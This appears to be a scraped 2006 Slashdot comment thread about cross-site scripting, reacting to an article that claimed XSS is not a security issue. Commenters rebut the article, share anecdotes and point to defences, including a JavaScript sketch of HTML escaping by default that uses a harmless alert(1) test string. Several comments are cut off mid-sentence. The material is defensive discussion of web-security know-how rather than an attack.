Unavoidable? I didn't know ASP, for example, and when I was using it for the first time and had a user variable which was displayed as HTML, 2 minutes of Googling led me to HTMLEncode(). Problem solved, for the most part. A real programmer can accomplish this in any language, with a regex or whatever.

    Whoever wrote this obviously
When I came across the parent comment, I was curious to see how it actually worked. Unlike the common XSS attacks, this one doesn't require JavaScript to be enabled: when you search the vulnerable site, it echoes the search query back to the browser. The query is stored in the $s variable, and apparently the variable isn't sanitized before being output, so one can inject whatever HTML code they like into the page. The vulnerability is mentioned here on the WP support forums [wordpress.org], sadly posters assumed that such code
  • Feeling a bit lost? No damn wonder.

    After reading the linked article, you probably don't know what XSS is unless you knew going in. Here's a link to a FAQ on XSS. http://www.cgisecurity.com/articles/xss-faq.shtml [cgisecurity.com].

    As for the article. My impression is that it is not very well written. I don't know enough about XSS to be sure, but for the most part I don't think it is a very accurate assessment. It appears to me that XSS attacks most certainly are a security issue and are by no means limited to Javas

  • by damburger (981828) on Friday June 23, 2006 @02:48AM (#15587812)
    ...we prefer to call it an 'unrequested Javascript surplus'"

    But that isn't the best bit:

"Sites with XSS "vulnerabilities" aren't insecure. They're absolutely no different than any other site - except that a user can manipulate the way content displays on an "insecure" page"

That's like saying 'Pearl Harbour wasn't "vulnerable". It was absolutely no different than any other naval base - except that the Japanese could drop bombs on it'
In my master's thesis I implemented a solution in the Mozilla Firefox web browser that protects the surfing user. It analyzes the data access and data flow in the JavaScript engine of the web browser.

    NoMoXSS (no more XSS)
    http://www.seclab.tuwien.ac.at/projects/jstaint/ [tuwien.ac.at]

    Although it is only a prototype of an implementation (in a rather old version of firefox), it shows the potential of this solution to stop XSS attacks.
  • Part of the problem with XSS is that pretty much every single web development tool out there has the wrong defaults. When you build a page in a templating system, anything that you insert into that template should be HTML escaped by default. Of course, you need an easy way to turn that off. But that simple act would probably fix 99% of holes out there. For example, in HTML::Mason [masonhq.com], I've set it up so that this:

    <% $foo %>

    gets escaped, whilst this does not.

    <% $foo |n %>

    The question remains
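The escape-by-default idea the parent describes for HTML::Mason translates directly to other languages. Here is a sketch of the same default-plus-opt-out design as a JavaScript tagged template; the names (`html`, `raw`) are my own illustration, not any real library's API:

```javascript
// Escape-by-default templating sketch: interpolated values are HTML-escaped
// unless explicitly wrapped in raw(), mirroring Mason's "<% $foo %>" vs
// "<% $foo |n %>" distinction described above.
function escapeHtml(s) {
  return String(s).replace(/&/g, "&amp;").replace(/</g, "&lt;")
                  .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

class Raw { constructor(s) { this.s = s; } }  // opt-out wrapper, like "|n"
const raw = (s) => new Raw(s);

function html(strings, ...values) {
  // Interleave literal chunks with values, escaping everything not marked Raw.
  return strings.reduce((out, str, i) => {
    const v = values[i - 1];
    return out + (v instanceof Raw ? v.s : escapeHtml(v)) + str;
  });
}

const foo = '<script>alert(1)</script>';
console.log(html`<p>${foo}</p>`);              // escaped by default
console.log(html`<p>${raw("<b>ok</b>")}</p>`); // explicit opt-out
```

The point is exactly the parent's: the safe behavior is what you get when you forget, and the dangerous behavior requires a visible, greppable opt-out.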

  • Can we mod the article -1 troll?
  • by supersnail (106701) on Friday June 23, 2006 @07:04AM (#15588437)
Much of the article seems to be a diatribe against JavaScript, more properly called ECMAScript.
I was always prejudiced against JavaScript, but a couple of years ago I was stuck with a problem which could only be done in JavaScript (the selections in the second menu depended on your choice in the first menu, and all other checkboxes and menus depended on the second menu selection) or with about 50 static pages.
I actually came to like it; it's actually a very clean and consistent programming language, albeit with very few builtin features. After a couple of days the only times I ever felt the need to RTFM were for the exact names of the various bits of the web browser's DOM structure.

How anyone could recommend VB over JavaScript is beyond me, and, I note, no one has suggested the return of the Java applet!

As for buggy, well, there are JavaScript programs with bugs in them, but there are very, very few bugs in the ECMAScript implementations I have dealt with.
  • back around '99 I worked for a very short time for an 'e-commerce website development' company. I was their very first dedicated tester.

    When I pointed out that users could enter javascript as a user name to be displayed to other users, they didn't care, the response was "Why would anyone want to hack a website?".

    The last website this company produced before then was for a major gaming company that produced a VERY popular collectable card game and had bought out another company that made a paper RPG game fea
